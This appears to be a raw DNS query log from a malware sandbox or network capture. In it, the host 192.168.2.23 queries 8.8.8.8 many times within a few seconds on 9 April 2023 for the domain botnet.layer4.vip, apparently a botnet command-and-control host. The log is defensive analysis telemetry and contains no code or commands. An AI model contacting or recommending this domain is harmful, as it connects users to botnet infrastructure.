                                  Apr 9, 2023 03:31:39.211710930 CEST192.168.2.238.8.8.80xbcbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.236249924 CEST192.168.2.238.8.8.80xbcbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.251966000 CEST192.168.2.238.8.8.80xbcbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.276329041 CEST192.168.2.238.8.8.80x966dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.292099953 CEST192.168.2.238.8.8.80x966dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.316859007 CEST192.168.2.238.8.8.80x966dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.341129065 CEST192.168.2.238.8.8.80x966dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.356739998 CEST192.168.2.238.8.8.80x966dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.381352901 CEST192.168.2.238.8.8.80x2f80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.397289038 CEST192.168.2.238.8.8.80x2f80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.421711922 CEST192.168.2.238.8.8.80x2f80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.437201023 CEST192.168.2.238.8.8.80x2f80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.461606026 CEST192.168.2.238.8.8.80x2f80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.485755920 CEST192.168.2.238.8.8.80xf789Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.501324892 CEST192.168.2.238.8.8.80xf789Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.516881943 CEST192.168.2.238.8.8.80xf789Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.540945053 CEST192.168.2.238.8.8.80xf789Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.565144062 CEST192.168.2.238.8.8.80xf789Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.589716911 CEST192.168.2.238.8.8.80xc289Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.614294052 CEST192.168.2.238.8.8.80xc289Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.638541937 CEST192.168.2.238.8.8.80xc289Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.662697077 CEST192.168.2.238.8.8.80xc289Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.687031031 CEST192.168.2.238.8.8.80xc289Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.712879896 CEST192.168.2.238.8.8.80x686Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.728949070 CEST192.168.2.238.8.8.80x686Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.744527102 CEST192.168.2.238.8.8.80x686Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.760468006 CEST192.168.2.238.8.8.80x686Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.776052952 CEST192.168.2.238.8.8.80x686Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.791764975 CEST192.168.2.238.8.8.80xa50fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.807332039 CEST192.168.2.238.8.8.80xa50fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.823848009 CEST192.168.2.238.8.8.80xa50fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.840177059 CEST192.168.2.238.8.8.80xa50fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.864631891 CEST192.168.2.238.8.8.80xa50fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.892280102 CEST192.168.2.238.8.8.80x96d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.908595085 CEST192.168.2.238.8.8.80x96d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.932919025 CEST192.168.2.238.8.8.80x96d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.957041979 CEST192.168.2.238.8.8.80x96d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.973699093 CEST192.168.2.238.8.8.80x96d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:39.989212990 CEST192.168.2.238.8.8.80x6b14Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.005755901 CEST192.168.2.238.8.8.80x6b14Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.022392988 CEST192.168.2.238.8.8.80x6b14Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.047745943 CEST192.168.2.238.8.8.80x6b14Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.063353062 CEST192.168.2.238.8.8.80x6b14Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.087641001 CEST192.168.2.238.8.8.80xaa22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.112232924 CEST192.168.2.238.8.8.80xaa22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.136699915 CEST192.168.2.238.8.8.80xaa22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.161237955 CEST192.168.2.238.8.8.80xaa22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.185967922 CEST192.168.2.238.8.8.80xaa22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.210621119 CEST192.168.2.238.8.8.80x76cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.235049963 CEST192.168.2.238.8.8.80x76cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.250756025 CEST192.168.2.238.8.8.80x76cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.274842024 CEST192.168.2.238.8.8.80x76cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.298980951 CEST192.168.2.238.8.8.80x76cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.323470116 CEST192.168.2.238.8.8.80x7cb2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.348154068 CEST192.168.2.238.8.8.80x7cb2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.363699913 CEST192.168.2.238.8.8.80x7cb2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.388792992 CEST192.168.2.238.8.8.80x7cb2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.413269043 CEST192.168.2.238.8.8.80x7cb2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.429303885 CEST192.168.2.238.8.8.80x3b31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.453955889 CEST192.168.2.238.8.8.80x3b31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.479065895 CEST192.168.2.238.8.8.80x3b31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.495095968 CEST192.168.2.238.8.8.80x3b31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.511888981 CEST192.168.2.238.8.8.80x3b31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.536797047 CEST192.168.2.238.8.8.80x180cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.561077118 CEST192.168.2.238.8.8.80x180cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.586571932 CEST192.168.2.238.8.8.80x180cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.602782965 CEST192.168.2.238.8.8.80x180cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.618558884 CEST192.168.2.238.8.8.80x180cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.634438992 CEST192.168.2.238.8.8.80x6983Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.658967972 CEST192.168.2.238.8.8.80x6983Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.683085918 CEST192.168.2.238.8.8.80x6983Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.707925081 CEST192.168.2.238.8.8.80x6983Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.732187033 CEST192.168.2.238.8.8.80x6983Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.757265091 CEST192.168.2.238.8.8.80xe55aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.781296968 CEST192.168.2.238.8.8.80xe55aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.806278944 CEST192.168.2.238.8.8.80xe55aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.823024988 CEST192.168.2.238.8.8.80xe55aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.838741064 CEST192.168.2.238.8.8.80xe55aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.862978935 CEST192.168.2.238.8.8.80x7b7fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.887044907 CEST192.168.2.238.8.8.80x7b7fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.911880016 CEST192.168.2.238.8.8.80x7b7fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.927762985 CEST192.168.2.238.8.8.80x7b7fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.944205999 CEST192.168.2.238.8.8.80x7b7fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.968621969 CEST192.168.2.238.8.8.80x6ffbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:40.984520912 CEST192.168.2.238.8.8.80x6ffbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.008871078 CEST192.168.2.238.8.8.80x6ffbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.033216000 CEST192.168.2.238.8.8.80x6ffbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.048779011 CEST192.168.2.238.8.8.80x6ffbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.065258026 CEST192.168.2.238.8.8.80xed18Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.081762075 CEST192.168.2.238.8.8.80xed18Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.106767893 CEST192.168.2.238.8.8.80xed18Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.130839109 CEST192.168.2.238.8.8.80xed18Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.147028923 CEST192.168.2.238.8.8.80xed18Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.162586927 CEST192.168.2.238.8.8.80xd76bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.186990976 CEST192.168.2.238.8.8.80xd76bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.211378098 CEST192.168.2.238.8.8.80xd76bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.227015972 CEST192.168.2.238.8.8.80xd76bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.242759943 CEST192.168.2.238.8.8.80xd76bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.258234978 CEST192.168.2.238.8.8.80x3a8fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.274038076 CEST192.168.2.238.8.8.80x3a8fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.298095942 CEST192.168.2.238.8.8.80x3a8fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.313617945 CEST192.168.2.238.8.8.80x3a8fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.329065084 CEST192.168.2.238.8.8.80x3a8fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.353502989 CEST192.168.2.238.8.8.80x3df2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.377583981 CEST192.168.2.238.8.8.80x3df2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.393089056 CEST192.168.2.238.8.8.80x3df2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.417531967 CEST192.168.2.238.8.8.80x3df2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.442425013 CEST192.168.2.238.8.8.80x3df2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.458046913 CEST192.168.2.238.8.8.80x5620Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.482492924 CEST192.168.2.238.8.8.80x5620Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.506931067 CEST192.168.2.238.8.8.80x5620Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.531114101 CEST192.168.2.238.8.8.80x5620Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.546968937 CEST192.168.2.238.8.8.80x5620Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.571089983 CEST192.168.2.238.8.8.80x5f10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.587177038 CEST192.168.2.238.8.8.80x5f10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.603838921 CEST192.168.2.238.8.8.80x5f10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.627856970 CEST192.168.2.238.8.8.80x5f10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.643734932 CEST192.168.2.238.8.8.80x5f10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.659605026 CEST192.168.2.238.8.8.80xc20dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.684223890 CEST192.168.2.238.8.8.80xc20dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.709700108 CEST192.168.2.238.8.8.80xc20dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.725322962 CEST192.168.2.238.8.8.80xc20dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.749438047 CEST192.168.2.238.8.8.80xc20dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.773869038 CEST192.168.2.238.8.8.80x2b33Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.799310923 CEST192.168.2.238.8.8.80x2b33Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.823998928 CEST192.168.2.238.8.8.80x2b33Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.839858055 CEST192.168.2.238.8.8.80x2b33Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.863985062 CEST192.168.2.238.8.8.80x2b33Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.888473988 CEST192.168.2.238.8.8.80xe7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.913300991 CEST192.168.2.238.8.8.80xe7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.937705994 CEST192.168.2.238.8.8.80xe7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.953336000 CEST192.168.2.238.8.8.80xe7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.968982935 CEST192.168.2.238.8.8.80xe7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:41.993797064 CEST192.168.2.238.8.8.80x53e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.009848118 CEST192.168.2.238.8.8.80x53e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.034014940 CEST192.168.2.238.8.8.80x53e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.050142050 CEST192.168.2.238.8.8.80x53e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.074811935 CEST192.168.2.238.8.8.80x53e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.099351883 CEST192.168.2.238.8.8.80xa5efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.123596907 CEST192.168.2.238.8.8.80xa5efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.147921085 CEST192.168.2.238.8.8.80xa5efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.171968937 CEST192.168.2.238.8.8.80xa5efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.196301937 CEST192.168.2.238.8.8.80xa5efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.220519066 CEST192.168.2.238.8.8.80xce72Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.244625092 CEST192.168.2.238.8.8.80xce72Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.260109901 CEST192.168.2.238.8.8.80xce72Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.284503937 CEST192.168.2.238.8.8.80xce72Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.308960915 CEST192.168.2.238.8.8.80xce72Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.333544970 CEST192.168.2.238.8.8.80xb3e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.349324942 CEST192.168.2.238.8.8.80xb3e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.364810944 CEST192.168.2.238.8.8.80xb3e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.380702019 CEST192.168.2.238.8.8.80xb3e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.396262884 CEST192.168.2.238.8.8.80xb3e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.420448065 CEST192.168.2.238.8.8.80x40c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.444526911 CEST192.168.2.238.8.8.80x40c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.460421085 CEST192.168.2.238.8.8.80x40c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.476027966 CEST192.168.2.238.8.8.80x40c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.500510931 CEST192.168.2.238.8.8.80x40c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.516448975 CEST192.168.2.238.8.8.80xbb4aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.532231092 CEST192.168.2.238.8.8.80xbb4aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.556324959 CEST192.168.2.238.8.8.80xbb4aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.580540895 CEST192.168.2.238.8.8.80xbb4aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.604665995 CEST192.168.2.238.8.8.80xbb4aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.629556894 CEST192.168.2.238.8.8.80xc067Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.654046059 CEST192.168.2.238.8.8.80xc067Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.678147078 CEST192.168.2.238.8.8.80xc067Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.710450888 CEST192.168.2.238.8.8.80xc067Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.735101938 CEST192.168.2.238.8.8.80xc067Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.759784937 CEST192.168.2.238.8.8.80xb76cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.775758028 CEST192.168.2.238.8.8.80xb76cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.799880981 CEST192.168.2.238.8.8.80xb76cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.824047089 CEST192.168.2.238.8.8.80xb76cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.839989901 CEST192.168.2.238.8.8.80xb76cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.864304066 CEST192.168.2.238.8.8.80x210fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.888654947 CEST192.168.2.238.8.8.80x210fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.924072981 CEST192.168.2.238.8.8.80x210fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.948146105 CEST192.168.2.238.8.8.80x210fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.972521067 CEST192.168.2.238.8.8.80x210fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:42.988575935 CEST192.168.2.238.8.8.80xc806Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.012649059 CEST192.168.2.238.8.8.80xc806Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.037100077 CEST192.168.2.238.8.8.80xc806Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.061109066 CEST192.168.2.238.8.8.80xc806Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.076653004 CEST192.168.2.238.8.8.80xc806Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.100857019 CEST192.168.2.238.8.8.80xf01eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.116374016 CEST192.168.2.238.8.8.80xf01eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.131813049 CEST192.168.2.238.8.8.80xf01eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.156183004 CEST192.168.2.238.8.8.80xf01eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.180347919 CEST192.168.2.238.8.8.80xf01eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.196203947 CEST192.168.2.238.8.8.80xb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.220690012 CEST192.168.2.238.8.8.80xb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.236257076 CEST192.168.2.238.8.8.80xb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.251754999 CEST192.168.2.238.8.8.80xb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.275818110 CEST192.168.2.238.8.8.80xb3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.300285101 CEST192.168.2.238.8.8.80x75f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.324673891 CEST192.168.2.238.8.8.80x75f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.340198994 CEST192.168.2.238.8.8.80x75f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.355818987 CEST192.168.2.238.8.8.80x75f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
